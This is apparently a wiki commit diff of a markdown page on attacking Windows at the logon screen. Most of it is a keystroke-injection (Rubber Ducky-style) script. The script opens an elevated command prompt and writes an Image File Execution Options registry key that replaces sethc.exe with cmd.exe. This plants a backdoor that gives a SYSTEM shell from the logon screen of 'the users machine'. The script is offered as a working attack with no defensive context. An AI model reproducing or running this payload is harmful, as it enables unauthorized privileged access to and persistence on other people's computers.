Updated Attacking Windows At The Logon Screen, Gaining Access To CMD With System Privileges. (markdown)
This commit is contained in:
parent
a6ef1f1234
commit
d5924ad7c7
|
@ -6,26 +6,18 @@ This hack does require pre work and does require administrator privileges to mod
|
|||
### Pre work
|
||||
***
|
||||
|
||||
* DELAY 400
|
||||
* ESCAPE
|
||||
* DELAY 200
|
||||
* DELAY 400
|
||||
* ESCAPE
|
||||
* DELAY 200
|
||||
* CONTROL ESCAPE
|
||||
* DELAY 500
|
||||
* STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
|
||||
* DELAY 500
|
||||
* DELAY 750
|
||||
* STRING cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f"
|
||||
* DELAY 750
|
||||
* CTRL-SHIFT ENTER
|
||||
* DELAY 1000
|
||||
* ALT C
|
||||
* DELAY 750
|
||||
* ALT SPACE
|
||||
* STRING M
|
||||
* DOWNARROW
|
||||
* REPEAT 100
|
||||
* ENTER
|
||||
* DELAY 400
|
||||
* STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
|
||||
* ENTER
|
||||
* STRING exit
|
||||
|
||||
* ALT y
|
||||
|
||||
|
||||
Left Alt + Left Shift + Print Screen to access the prompt.
|
||||
Ok so that's the pre work done now when the users machine is logged off and you want to be able to execute commands or even if you just want to be able to execute commands as the system not as administrator all you need to do is press
|
||||
Left Alt + Left Shift + Print Screen.
|
Loading…
Reference in New Issue